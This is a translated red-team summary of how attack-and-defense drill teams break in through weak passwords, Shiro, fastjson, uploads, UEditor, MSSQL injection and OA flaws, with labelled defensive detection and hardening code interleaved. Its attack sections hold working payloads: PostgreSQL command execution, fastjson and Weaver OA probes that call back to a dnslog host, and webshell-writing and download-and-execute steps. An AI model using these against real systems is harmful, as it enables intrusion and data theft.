How to open the gap in attack and defense drill — Summary

Time: 2022-5-14

Preface

(This may be a narrow view; there are surely omissions and mistakes, and corrections from the experts are welcome.)

Article information

Author: 0ne

The data in this article comes from the breach reports of 18+ provincial- and municipal-level HVV drills covering 90+ units (part from the author's own participation, the rest from reports by other colleagues at the company). The ideas are simple ones; phishing and 0day exploitation are not included.


Statistical chart of breakthrough entry-point methods: [image not preserved]

The scoring items in an attack-and-defense drill focus on only two things: permissions and data. Permissions are divided by type into system permissions and application permissions, and by level into administrator and ordinary-user permissions. Data usually means the four-piece set: name, mobile phone number, ID card number and address. Sensitive data is usually defined this way, but the definition may differ with the application; in a hospital system, for example, medical records also count as sensitive data.
The following goes through some of the methods from the statistics above, in order from high to low score.

Weak password [web application]

Weak passwords are a vulnerability that can never be fully fixed; every attack-and-defense drill has a hole torn open by a weak password (29 times).

Only the weak passwords of web applications are discussed here; the PostgreSQL / Redis / VPN / Jenkins / administrator weak passwords in the statistics are covered separately.
When talking about weak passwords, brute-forcing technique has to be mentioned. Before brute-forcing, try to bypass the captcha: some captchas are not refreshed, or the verification logic has errors that can be bypassed. The forgot-password function often has a username enumeration vulnerability. For the username dictionary, names can be guessed as short names or employee IDs according to the system at hand; you can also look at the JS regular expressions on the login box, or use Google searches, to make a reasonable guess. When the user base is large, spraying one fixed weak password across the username list is usually the best approach. From the many admin password MD5 hashes obtained through SQL injection and then decrypted, the probability that an administrator's password is the domain-name abbreviation or system abbreviation + @ + year, or some related abbreviation, is not small. For example: a fire-protection system / bjtuxfk [XXXX fire department]; the back end of a women's federation / [email protected]

Handy dictionaries:
https://github.com/fuzz-security/SuperWordlist
https://github.com/gh0stkey/Web-Fuzzing-Box
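The spraying pattern described above (one fixed weak password across many usernames) and the abbreviation + @ + year passwords are both visible to a defender. The following is an added example, not code from the original post: a detector that runs over constructed authentication log lines (the log format, IPs and usernames are assumptions made for this example) and a policy check that rejects abbreviation-plus-year passwords when they are set.

```python
"""Password-spray detection over constructed authentication log lines.

Added example (not part of the original post): with a large user base an
attacker iterates usernames with one fixed weak password. In auth logs that
shows up as one source IP failing against many distinct usernames with one
or two attempts each. Log format and entries below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<ISO time> <source ip> <username> <OK|FAIL>"
SAMPLE_LOG = """\
2022-05-14T09:00:01 10.0.0.5 zhangsan FAIL
2022-05-14T09:00:02 10.0.0.5 lisi FAIL
2022-05-14T09:00:03 10.0.0.5 wangwu FAIL
2022-05-14T09:00:04 10.0.0.5 zhaoliu FAIL
2022-05-14T09:00:05 10.0.0.5 sunqi FAIL
2022-05-14T09:00:06 10.0.0.5 zhouba FAIL
2022-05-14T09:00:07 10.0.0.5 wujiu OK
2022-05-14T09:03:00 10.0.0.9 admin FAIL
2022-05-14T09:03:05 10.0.0.9 admin FAIL
2022-05-14T09:03:09 10.0.0.9 admin OK
"""


def parse_line(line):
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result


def detect_spray(log_text, window=timedelta(minutes=5), min_users=5):
    """Return {ip: sorted usernames} for sources whose failed logins cover at
    least `min_users` distinct usernames inside any sliding window of `window`.
    A single account being retried (10.0.0.9 above) is not a spray."""
    failures = defaultdict(list)  # ip -> [(timestamp, username)]
    for line in log_text.splitlines():
        if line.strip():
            ts, ip, user, result = parse_line(line)
            if result == "FAIL":
                failures[ip].append((ts, user))
    hits = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                # flagged: report every username this source tried
                hits[ip] = sorted({u for _, u in fails})
                break
    return hits


def successes_from_sprayers(log_text, hits):
    """Accounts that a spraying source eventually logged into: triage these first."""
    return [(ip, user)
            for ts, ip, user, result in map(parse_line, filter(str.strip, log_text.splitlines()))
            if result == "OK" and ip in hits]


def is_guessable(password, org_abbrevs):
    """True for <abbreviation>[@]<year>[symbol]-shaped passwords, the pattern
    the post reports seeing repeatedly in decrypted admin hashes; use it to
    reject such passwords when they are set."""
    p = password.lower()
    return any(re.fullmatch(re.escape(a.lower()) + r"@?(19|20)\d\d[.!#]?", p) for a in org_abbrevs)


if __name__ == "__main__":
    hits = detect_spray(SAMPLE_LOG)
    print(hits)
    print(successes_from_sprayers(SAMPLE_LOG, hits))
    print(is_guessable("bjtu@2022", ["bjtu"]))
```

The window and threshold are the knobs to tune against your own login volume; the second function is the part that matters during a drill, since a source that sprayed and then got an OK has found a weak account.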

Weak password [other]

Among database weak passwords, only PostgreSQL and Redis were encountered. Other commonly used databases get more attention; the remaining ones, operations staff may not even know are running.

PostgreSQL (versions 9.3 to 11.2) arbitrary command execution (CVE-2019-9193):

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Redis

Connect and run `info` to view server information [Redis version and OS]:
Redis 4.x/5.x RCE:

https://github.com/Dliv3/redis-rogue-server
https://github.com/0671/RedisModules-ExecuteCommand-for-Windows

Linux: write a cron job, write an SSH public key, write a webshell [requires knowing the web path]
Windows: write a startup item, write a webshell [requires knowing the web path]

Startup folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
https://github.com/r35tart/RedisWriteFile

To be honest, I haven't encountered a Windows one. If the permissions are sufficient, write the startup item first and then try a reboot [pure speculation, never actually tried QAQ].
These two articles on Windows & Redis are quite detailed:

https://xz.aliyun.com/t/8153
https://xz.aliyun.com/t/7940
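Everything in the Redis section depends on an instance that is reachable without a password and still has its configuration commands enabled. As an added example (not the post's code, and the two configuration texts plus the password placeholder are constructed), here is a small redis.conf audit that flags exactly those conditions:

```python
"""Audit a redis.conf for the exposure the post relies on: a Redis reachable
from the network with no password, where CONFIG SET dir/dbfilename can write
files and MODULE LOAD can run code. Added example, not the post's own; the
two configuration texts are constructed and the password is a placeholder."""

# Commands the file-write / module-load tricks depend on; rename-command to ""
# disables them (ACLs are the modern alternative on Redis 6+).
DANGEROUS_COMMANDS = ("CONFIG", "MODULE", "DEBUG", "SLAVEOF", "REPLICAOF")

SAMPLE_CONF_WEAK = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass not set: the instance is open to anyone who can reach the port
"""

SAMPLE_CONF_HARDENED = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret-placeholder
rename-command CONFIG ""
rename-command MODULE ""
rename-command DEBUG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
"""


def parse_conf(text):
    """Minimal redis.conf reader: directive -> list of values (some repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            key, _, value = line.partition(" ")
            conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def audit(conf):
    """Return a list of human-readable findings; empty means nothing flagged."""
    findings = []
    password = conf.get("requirepass", [""])[0].strip('"')
    if len(password) < 16:
        findings.append("requirepass missing or short")
    # With no bind directive Redis listens on every interface.
    binds = [b for v in conf.get("bind", ["0.0.0.0"]) for b in v.split()]
    if any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes Redis on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode disabled")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    findings.extend(f"{cmd} not disabled via rename-command"
                    for cmd in DANGEROUS_COMMANDS if cmd not in renamed)
    return findings


def audit_text(text):
    return audit(parse_conf(text))


if __name__ == "__main__":
    for name, text in (("weak", SAMPLE_CONF_WEAK), ("hardened", SAMPLE_CONF_HARDENED)):
        print(name, audit_text(text))
```

Run it against the real file on each host; the weak sample produces eight findings and the hardened one none.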

VPN weak password

If it is a WebVPN, the user base is large, and a fixed weak password can be sprayed against student IDs or employee IDs. The VPN weak passwords in the cases were for a client that had to be downloaded; the passwords looked less like guesses and more like credentials leaked via Google / git, or an employee's mobile number looked up in a leaked-credential database and pieced together from the information inside [personal guess].

Jenkins weak password

The script console in the Jenkins back end can execute commands; download-and-execute via LOLBAS needs no explanation.

Admin weak password

Writing a webshell through MySQL needs no explanation.

Shiro deserialization

Shiro forever god! Without Shiro I don't know how I'd make it through the day (28 times)

Over the past two years, Shiro deserialization has been the number-one vulnerability exploited in attack-and-defense drills. Whether it is the company's in-house asset-collection platform or the excellent open-source project ShuiZe on GitHub, they all carry Shiro fingerprint identification. Finding Shiro targets is also very simple: targets expand from domain names to subdomains to IPs to full port ranges; import these URLs into a Shiro identification tool, run it, and reuse the results. Of the 28 Shiro cases counted, 27 were collected through OneForAll or FOFA, and one was found in a WeChat official account.
Easy-to-use tools:

https://github.com/pmiaowu/BurpShiroPassiveScan
https://github.com/wyzxxz/shiro_rce_tool
https://github.com/j1anFen/shiro_attack
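The fingerprinting the tools above rely on is visible from the server side: a probe sends a junk rememberMe cookie and Shiro answers with Set-Cookie: rememberMe=deleteMe, and a deserialization attempt carries a rememberMe cookie far larger than a genuine encrypted principal collection. As an added example (not from the post; the request records, IPs and thresholds are constructed for this example), here is a log-side check that flags both behaviours:

```python
"""Flag Shiro rememberMe abuse in reverse-proxy / WAF request logs.

Added example, not from the post. Two observations a defender can use: a
scanner fingerprinting Shiro sends junk rememberMe cookies and gets
'Set-Cookie: rememberMe=deleteMe' back (Shiro's forgetIdentity on a cookie it
cannot decrypt), and a deserialization payload is far larger than a genuine
encrypted principal collection. The request records below are constructed.
"""
import base64
import binascii
import re
from collections import Counter, defaultdict


def _b64(n, ch=b"A"):
    return base64.b64encode(ch * n).decode()


# Constructed sample: one dict per request with the fields a proxy would log
SAMPLE_REQUESTS = [
    {"ip": "10.0.0.7", "cookie": "JSESSIONID=abc; rememberMe=" + _b64(304), "resp_set_cookie": ""},
    {"ip": "10.0.0.7", "cookie": "rememberMe=" + _b64(304), "resp_set_cookie": ""},
    {"ip": "10.0.0.8", "cookie": "rememberMe=1", "resp_set_cookie": "rememberMe=deleteMe; Path=/"},
    {"ip": "10.0.0.8", "cookie": "rememberMe=1", "resp_set_cookie": "rememberMe=deleteMe; Path=/"},
    {"ip": "10.0.0.8", "cookie": "rememberMe=1", "resp_set_cookie": "rememberMe=deleteMe; Path=/"},
    {"ip": "10.0.0.9", "cookie": "rememberMe=" + _b64(4096, b"B"), "resp_set_cookie": "rememberMe=deleteMe; Path=/"},
]

COOKIE_RE = re.compile(r"(?:^|;\s*)rememberMe=([^;]*)")


def remember_me_value(cookie_header):
    m = COOKIE_RE.search(cookie_header)
    return m.group(1) if m else None


def looks_like_shiro_cookie(value):
    """Shiro's default rememberMe is base64(IV || AES-CBC ciphertext), so the
    decoded length is a multiple of 16 and at least two blocks."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 32 and len(raw) % 16 == 0


def analyse(requests, size_limit=1024, probe_threshold=3):
    """Return {ip: [reasons]} for sources worth blocking or investigating."""
    reasons = defaultdict(set)
    delete_me = Counter()
    for r in requests:
        value = remember_me_value(r["cookie"])
        if value is None:
            continue
        if len(value) > size_limit:
            reasons[r["ip"]].add("oversized rememberMe cookie (serialized payload?)")
        elif not looks_like_shiro_cookie(value):
            reasons[r["ip"]].add("malformed rememberMe cookie (fingerprint probe?)")
        if "rememberMe=deleteMe" in r.get("resp_set_cookie", ""):
            delete_me[r["ip"]] += 1
    for ip, n in delete_me.items():
        if n >= probe_threshold:
            reasons[ip].add(f"{n} rememberMe=deleteMe responses")
    return {ip: sorted(v) for ip, v in reasons.items()}


if __name__ == "__main__":
    print(analyse(SAMPLE_REQUESTS))
```

The size limit is the cheap rule to put in a WAF; the deleteMe counter needs response headers in the log but catches the fingerprinting stage before any payload is sent.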

Any file upload [general]

Plain and unadorned (10 occurrences)

In general, the fastest way to get a shell is to find an upload point. Quickly verify whether the upload is validated by a back-end allow-list; if it is a back-end allow-list check and cannot be combined with another vulnerability, give up on it. Note that when testing whether the upload uses a denylist or an allow-list, the uploaded file content should be harmless, otherwise the WAF may interfere: we need to know whether an upload fails because of the program's own restriction or because the WAF blocked it. Do not fuzz the upload interface; that is much thunder and little rain.
Worth mentioning: of the 10 uploads counted, one was in a WeChat mini program where a Swagger information leak exposed an upload interface, and one was in a bank's online chat system, where clicking "manual service" made a send-picture button appear.

Customer service system: [screenshot not preserved]

There is another case:
After entering the back end, files are uploaded through KindEditor and managed through XXXX, which has a rename function; rename to .php and getshell.
The essence of bypassing a WAF on file upload is the difference between how the server and the WAF parse the packet. Here are several abnormal packets: [screenshots not preserved]

Fastjson deserialization

Works well (6 occurrences)

Determine whether it is fastjson: an error message, a thrown exception, or a dnslog callback:

{"rand1":{"@type":"java.net.InetAddress","val":"gbi7ge.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}

When you meet a WAF: hex encoding or \B: [screenshot not preserved]

See:

https://www.sec-in.com/article/950
https://xz.aliyun.com/t/7568

Easy-to-use tools:

https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/wyzxxz/fastjson_rce_tool
https://github.com/feihong-cs/JNDIExploit
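The dnslog probes above all hinge on an "@type" key, and the WAF-bypass encodings work because a substring rule never sees that key once it is escaped. The following is an added example, not code from the post or from the tools listed: it normalises fastjson's hex escapes, parses the body, and reports every "@type" key with its class name. The request bodies are constructed and the callback host is a placeholder.

```python
"""Detect fastjson autoType probes in request bodies, including the encoded
variants used to slip past a WAF. Added example, not from the post; bodies
are constructed and the callback host is a placeholder. fastjson accepts
\\xHH escapes that strict JSON parsers reject and \\u escapes that a naive
substring rule for "@type" never sees, so the body is normalised and parsed
before inspection."""
import json
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed request bodies (placeholder callback host, not a real service)
PLAIN = r'{"rand1":{"@type":"java.net.InetAddress","val":"probe.example.invalid"}}'
UNICODE_ESCAPED = r'{"rand2":{"\u0040type":"java.net.Inet4Address","val":"probe.example.invalid"}}'
HEX_ESCAPED = r'{"rand3":{"\x40type":"java.net.Inet6Address","val":"probe.example.invalid"}}'
BENIGN = r'{"name":"alice","type":"user","tags":["@typeahead"]}'


def normalise(body):
    """Map fastjson's \\xHH string escapes to \\u00HH so json.loads accepts them."""
    return HEX_ESCAPE.sub(lambda m: "\\u00" + m.group(1), body)


def find_autotype(obj, path="$"):
    """Recursively collect (json path, class name) for every "@type" key."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key == "@type":
                hits.append((path, str(value)))
            hits.extend(find_autotype(value, f"{path}.{key}"))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            hits.extend(find_autotype(value, f"{path}[{i}]"))
    return hits


def inspect_body(body):
    """Return what a naive substring rule sees versus what parsing finds."""
    naive = "@type" in body
    try:
        data = json.loads(normalise(body))
    except ValueError:
        return {"parsed": False, "naive_match": naive, "autotype": []}
    return {"parsed": True, "naive_match": naive, "autotype": find_autotype(data)}


if __name__ == "__main__":
    for body in (PLAIN, UNICODE_ESCAPED, HEX_ESCAPED, BENIGN):
        print(inspect_body(body))
```

The BENIGN body shows the other half of the problem: a substring rule fires on "@typeahead" while the parsed check does not, so the parsed rule is both stricter and quieter. Bodies that still fail to parse after normalisation deserve a look of their own, since fastjson is more lenient than the standard library parser.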

Disclosure of sensitive information

However small the fly, it is still meat (5 times)

Hospitals are the most common case: a WeChat official account or mini program through which case records can be enumerated:
[screenshots not preserved]

Swagger information disclosure, with query interfaces built from it, was also encountered:
[screenshots not preserved]
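The hospital cases above are record enumeration: a client walking case IDs one after another through an endpoint that never checks who owns the record. As an added example (not from the post; the endpoint name, log lines and ownership table are constructed), here is the log-side detector for that walk, next to the object-level authorization check whose absence makes it possible:

```python
"""Record-enumeration detection plus the missing object-level authorization
check. Added example, not from the post. A client walking case IDs appears
in access logs as one client requesting many near-sequential record IDs in a
short window. Endpoint names, log lines and the ownership table are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) "GET (?P<path>[^"]+)" (?P<status>\d{3})$')
ID_RE = re.compile(r"^/api/cases/(\d+)$")  # hypothetical record endpoint

SAMPLE_LOG = """\
2022-05-14T10:00:00 203.0.113.5 u1001 "GET /api/cases/1000" 200
2022-05-14T10:00:01 203.0.113.5 u1001 "GET /api/cases/1001" 200
2022-05-14T10:00:02 203.0.113.5 u1001 "GET /api/cases/1002" 200
2022-05-14T10:00:03 203.0.113.5 u1001 "GET /api/cases/1003" 200
2022-05-14T10:00:04 203.0.113.5 u1001 "GET /api/cases/1004" 200
2022-05-14T10:00:05 203.0.113.5 u1001 "GET /api/cases/1005" 200
2022-05-14T10:00:06 203.0.113.5 u1001 "GET /api/cases/1006" 200
2022-05-14T10:00:07 203.0.113.5 u1001 "GET /api/cases/1007" 200
2022-05-14T10:00:08 203.0.113.5 u1001 "GET /api/cases/1008" 200
2022-05-14T10:00:09 203.0.113.5 u1001 "GET /api/cases/1009" 200
2022-05-14T10:05:00 198.51.100.9 u2002 "GET /api/cases/7781" 200
2022-05-14T10:07:00 198.51.100.9 u2002 "GET /api/cases/7781" 200
2022-05-14T10:08:00 198.51.100.9 u2002 "GET /api/login" 200
"""


def detect_enumeration(log_text, window=timedelta(minutes=5), min_ids=8, max_gap=2):
    """Return [(ip, user, distinct_ids)] for clients that requested at least
    `min_ids` distinct record IDs, stepping by at most `max_gap`, within `window`."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        idm = ID_RE.match(m["path"])
        if idm:
            per_client[(m["ip"], m["user"])].append((datetime.fromisoformat(m["ts"]), int(idm.group(1))))
    flagged = []
    for (ip, user), hits in per_client.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ids = [rid for _, rid in hits[start:end + 1]]
            near = sum(1 for a, b in zip(ids, ids[1:]) if 1 <= abs(b - a) <= max_gap)
            if len(set(ids)) >= min_ids and near >= min_ids - 1:
                flagged.append((ip, user, len({rid for _, rid in hits})))
                break
    return flagged


# Constructed ownership table standing in for the application's database.
CASES = {
    1000: {"owner": "u1000", "diagnosis": "<redacted>"},
    1001: {"owner": "u1001", "diagnosis": "<redacted>"},
}


def fetch_case_unsafe(case_id):
    """What the vulnerable endpoint effectively does: any ID, any requester."""
    return CASES.get(case_id)


def fetch_case(case_id, requester):
    """Object-level authorization: only the owner gets the record, and a
    missing record and someone else's record look identical to the caller."""
    rec = CASES.get(case_id)
    return rec if rec is not None and rec["owner"] == requester else None


if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG))
    print(fetch_case(1001, "u1001"), fetch_case(1001, "u1000"))
```

Returning the same "not found" answer for a missing record and for another user's record matters: otherwise the endpoint still tells an enumerating client which IDs exist.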

UEditor 1.4.3 arbitrary file upload

Surprise (5 occurrences)

When you meet a .NET website, right-click to view an image, and the URL is /ueditor/upload/image/[20200101, i.e. this year/month format]/25 digits.png, you can judge that the site uses UEditor [a directory scanning tool also works], so splice in the path ~/net/controller.ashx:
The ~ prefix may not be fixed; look for it in the JS or make a reasonable guess.
Worth mentioning: I previously met a site where png?.aspx returned 404, but png.aspx could be used directly; UEditor also has filtering? When a WAF is present, use this as appropriate.

[screenshot not preserved]
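The upload cases on this page (the general upload section, the KindEditor rename-to-.php case, and the UEditor png?.aspx case above) all come down to the same server-side decisions. The following is an added example, not code from the post or from either editor: a back-end allow-list validator in which the stored name is generated by the server, renames go through the same check, and a name containing "?" is rejected outright instead of being parsed for an extension. The type list and magic-byte signatures are a small constructed set.

```python
"""Server-side upload validation. Added example, not from the post: a
back-end allow-list (not a denylist) decides what is accepted, the stored
name is generated by the server, renaming after upload goes through the same
check, and a name such as 'x.png?.aspx' is rejected rather than parsed for
an extension. Type list and signatures are a small constructed set."""
import re
import secrets

ALLOWED_TYPES = {  # extension -> accepted magic bytes
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF",),
}
# Script extensions that must not appear in ANY position: Apache mod_mime
# style multi-extension handling can execute 'a.php.png'.
SCRIPT_EXTS = {"php", "php3", "php5", "phtml", "jsp", "jspx", "asp", "aspx", "ashx", "asa", "cer"}
# Bare name plus one or more extensions; no '/', '?', NUL, spaces or trailing dots.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+")


class UploadRejected(ValueError):
    pass


def check_filename(filename):
    """Return the canonical extension, or raise UploadRejected."""
    if not NAME_RE.fullmatch(filename):
        raise UploadRejected("unsafe characters or structure in name")
    parts = filename.lower().split(".")
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        raise UploadRejected("script extension in name")
    if parts[-1] not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{parts[-1]} not in allow-list")
    return parts[-1]


def check_content(ext, data):
    """The bytes must look like the declared type, not just carry its name."""
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match declared type")


def accept_upload(filename, data):
    """Validate name and content; return the server-generated storage name."""
    ext = check_filename(filename)
    check_content(ext, data)
    return f"{secrets.token_hex(16)}.{ext}"


def rename_upload(stored_name, new_name):
    """Renaming uses the same allow-list and may not change the type."""
    if check_filename(new_name) != stored_name.rsplit(".", 1)[-1]:
        raise UploadRejected("rename may not change the file type")
    return new_name


def is_rejected(fn, *args):
    """Helper for quick checks: True if the call raises UploadRejected."""
    try:
        fn(*args)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    print(accept_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    for name in ("shell.php", "shell.png?.aspx", "a.aspx.png", "shell.aspx.", "../x.png"):
        print(name, "rejected" if is_rejected(check_filename, name) else "accepted")
```

Serving the upload directory from a host or path with script execution disabled is the second half of the defence; the validator keeps the names and content sane, and the web server configuration guarantees that nothing in that directory is executed even if the validator is wrong.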

MSSQL Stack Injection

Basic operation

After --os-shell you get a command line; usually download-and-execute via certutil, or launch PowerShell directly. You can also write a webshell:

Find the physical path of static resources:
for /r C:\ %i in (*xxx*) do @echo %i
dir /s /a-d /b C:\*xxx.xxx
echo ^<one-liner webshell^> > C:\phpstudy_pro\WWW\shell.txt
Note that < and > must be escaped with ^

OA system

Nothing to say: 0day smashing 0day.

Fanwei (Weaver) OA, Zhiyuan (Seeyon) OA, Tongda OA, Yonyou NC
GitHub search, internal accumulation; undisclosed exploitation points are the best.
The two Fan* OA cases used WorkflowServiceXml deserialization, which was relatively smooth.
Determine whether it is exploitable:

POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 523
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:doCreateWorkflowRequest>
         <web:string>
            <map>
               <entry>
                  <url>http://m5alw5.dnslog.cn</url>
                  <string>http://m5alw5.dnslog.cn</string>
               </entry>
            </map>
         </web:string>
         <web:string>2</web:string>
      </web:doCreateWorkflowRequest>
   </soapenv:Body>
</soapenv:Envelope>

Miscellaneous

Rambling

Getting sensitive data via SQL injection is unremarkable; remember to add the --random-agent parameter to sqlmap.
Struts2 (S2) is seen less often on the Internet-facing side, and I don't know how that boss got in through the perimeter.
A historical backdoor, a 404.jsp, becoming the entry point is also outrageous.
All kinds of debug information get leaked; import the cloud access key into the cloud housekeeper tool and prove the permission.
(Already rambling by now.)

Gossip

Pick the soft persimmons to squeeze

Web work in a drill is an efficiency job: pick the soft persimmon. Don't be handed a site and only find out after a long time: eh, there's an upload / Shiro / fastjson here. That delays our effort. Be purposeful, try to reduce trial and error, and do less useless work.
